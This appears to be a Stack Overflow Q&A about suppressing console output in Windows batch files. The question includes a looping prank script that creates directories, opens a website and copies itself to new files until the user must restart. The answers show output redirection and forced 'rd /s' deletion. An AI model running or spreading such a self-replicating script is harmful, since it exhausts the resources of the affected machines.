# @echo off is not working in batch scripts

Tags: windows, batch-file

I Have several batch scripts on my computer, many of the harmless and annoying. Unfortunately, `@echo off` just isn't working on my computer.

Here is the script:

```
@echo off
:top
md %random%
start http://roblox.com
set self=%~n0
REM get own filename
TYPE %self%.bat > %self%%random%%random%.bat
goto top
(it's just extremely annoying and pretty much just makes it to where you have to restart)
```

Normally it wouldn't show the cmd. However, I can see the command prompt clear as day.

Comment: Do you have a screenshot of cmd when you run the batch file through it? Or just a piece of text?

Comment: `echo off` just prevents the comments from listing... it doesn't stop the output from the execute commands.  for that use `> NUL`

Comment: OK, then i'm just stupid

Answer (score 0):

Seems like you want to hide the **output** of the comments rather than the prompt and themselves. This can be done by redirecting their STDOUT and STDERR to `NUL`.

If you start your batch file from cmd, then start it with:

```bat
(batch.bat)>NUL 2>&1
```

and if you start it by double-click, then either create another batch file with content:

```bat
@(batch.bat)>NUL 2>&1
```

or in your batch file, start with (not highly recommended):

```bat
@echo off
setlocal EnableDelayedExpansion

(
content
of
your
batch
file
)>NUL 2>&1
```

but note that you should access variable with `!var!` rather than `%var%`, that's why I don't recommend this way.

Answer (score 0):

Refer [here](https://stackoverflow.com/questions/8823643/echo-off-but-messages-are-displayed) for explanation.

```
:: This does not show the result output
@echo off
echo y|rd /s build > null 
mkdir build

:: This shows the result output
echo y|rd /s external
mkdir external
```

```
::No output at all
@echo off
(
echo y|rd /s build
mkdir build
echo y|rd /s external
mkdir external
)>NULL 2>&1
```